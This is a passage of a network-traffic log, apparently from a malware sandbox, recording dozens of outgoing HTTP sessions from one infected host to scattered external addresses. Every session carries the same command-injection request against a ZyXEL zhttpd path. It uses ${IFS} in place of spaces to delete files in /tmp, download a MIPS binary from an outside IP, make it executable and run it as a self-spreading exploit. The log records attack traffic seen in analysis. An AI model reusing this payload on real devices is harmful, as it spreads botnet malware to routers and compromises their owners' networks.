                                                Jan 12, 2024 18:24:49.170469999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7687192.168.2.1343462166.254.122.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.170512915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7688192.168.2.1357844180.92.207.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.170542002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7689192.168.2.135427091.72.173.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.170579910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7690192.168.2.1353992131.153.33.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.170629978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7691192.168.2.13401862.55.21.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.170666933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7692192.168.2.1348404102.215.146.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.170711994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7693192.168.2.1332826145.217.233.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.170758963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7694192.168.2.1359774122.221.136.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.170795918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7695192.168.2.1350770175.139.119.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.170815945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7696192.168.2.1334382186.78.73.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.170835972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7697192.168.2.1358048208.0.27.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.170900106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7698192.168.2.134254873.48.162.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.170932055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7699192.168.2.1337632122.11.36.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.170962095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7700192.168.2.1347122105.216.153.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.171003103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7701192.168.2.1333290140.211.83.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.171052933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7702192.168.2.1351082186.124.212.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.171094894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7703192.168.2.133499247.36.75.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.171152115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7704192.168.2.1352628176.3.53.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.171192884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7705192.168.2.1359818188.225.121.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.171211004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7706192.168.2.1348838199.241.78.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.171257973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7707192.168.2.1353756209.120.77.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.171279907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7708192.168.2.135980094.47.84.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.171338081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7709192.168.2.1354910115.14.199.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.171371937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7710192.168.2.133436876.128.231.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.171396971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7711192.168.2.1344530152.116.145.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.171427011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7712192.168.2.134736491.210.63.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.171478033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7713192.168.2.1357142165.208.102.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.171529055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7714192.168.2.1334770194.74.219.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.171565056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7715192.168.2.13336165.206.51.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.171617985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7716192.168.2.1355232118.84.64.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.171658993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7717192.168.2.1347818184.196.2.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.171680927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7718192.168.2.1341568111.21.156.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.171729088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7719192.168.2.135021493.79.154.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.171766996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7720192.168.2.1352996180.26.197.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.171811104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7721192.168.2.1345900216.143.152.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.171848059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7722192.168.2.1344272205.77.152.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.171884060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7723192.168.2.1360540157.54.75.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.171933889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7724192.168.2.133960269.90.79.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.171966076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7725192.168.2.1360080194.224.170.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.171989918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7726192.168.2.1358082152.216.33.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.172055006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7727192.168.2.1352602111.178.42.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.172068119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7728192.168.2.13434845.93.169.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.172117949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7729192.168.2.1344018196.111.145.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.172151089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7730192.168.2.135983096.52.60.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.172195911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7731192.168.2.133497427.152.64.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.172230005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7732192.168.2.134198648.73.139.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.172281027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7733192.168.2.1358398112.83.91.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.172316074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7734192.168.2.1335998154.21.192.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.172348022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7735192.168.2.1335876125.209.228.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.172391891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7736192.168.2.1347654143.244.33.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.172425985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7737192.168.2.1350888148.67.78.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.172473907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7738192.168.2.1342280129.69.82.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.172517061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7739192.168.2.1357676221.17.105.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.172540903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7740192.168.2.1347106102.93.248.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.172574043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7741192.168.2.1351866159.232.145.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.172604084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7742192.168.2.1354896172.154.84.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.172651052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7743192.168.2.1356378181.211.190.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.172691107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7744192.168.2.1335510101.71.41.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.172719955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7745192.168.2.1352392187.153.183.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.172776937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7746192.168.2.1337542182.197.65.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.172801018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7747192.168.2.1353760159.219.169.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.172827005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7748192.168.2.1353558199.73.230.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.172884941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7749192.168.2.1356020145.255.241.133443
                                                TimestampBytes transferredDirectionData
